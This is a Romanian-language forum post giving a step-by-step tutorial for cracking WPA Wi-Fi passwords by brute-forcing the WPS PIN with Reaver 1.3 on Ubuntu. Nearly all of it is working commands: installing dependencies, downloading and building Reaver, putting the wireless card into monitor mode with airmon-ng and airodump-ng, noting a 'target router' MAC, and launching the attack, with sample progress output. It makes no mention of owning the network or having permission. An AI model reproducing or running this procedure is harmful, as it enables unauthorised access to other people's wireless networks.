Jump to content
actunderdc

Spargere parola WPA folosind Reaver 1.3

Recommended Posts

Testat pe Ubuntu 11.10 x32.

Metoda se bazeaza pe vulnerabilitatea Wi-fi protected setup (face brute force pana gaseste pinul).

Sa incepem:

1. Ne pregatim pachetele necesare

sudo apt-get update

sudo apt-get install libpcap-dev

sudo apt-get install libsqlite3-dev

2. Descarcare Reaver 1.3

wget http://reaver-wps.googlecode.com/files/reaver-1.3.tar.gz

3. Dezarhivare

tar zxvf reaver-1.3.tar.gz

4. Navigare in folderul de instalare:

cd reaver-1.3/src

5. Configurare maker

./configure

6. Instalare

make

sudo make install

7.Pregatire placa wireless:

sudo airmon-ng stop wlan0

sudo airmon-ng start wlan0

sudo airodump-ng mon0

Va notati mac-ul routerului tinta. Apoi apasati Ctrl+C.

8.Lansarea atacului brute-force cu reaver:

sudo reaver -i mon0 -b 1A:5E:E5:FG:14:11 

(aici va inlocuiti mac-ul pe care l-ati notat la punctul 7.

Veti obtine ceva de genul:

[+] Waiting for beacon from [mac]

[+] Associated with [mac] (ESSID: nume_retea)

[+] 0.05% complete @ 2012-01-21 20:31:36 (4 seconds/attempt)

Succes!

  • Upvote 1
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...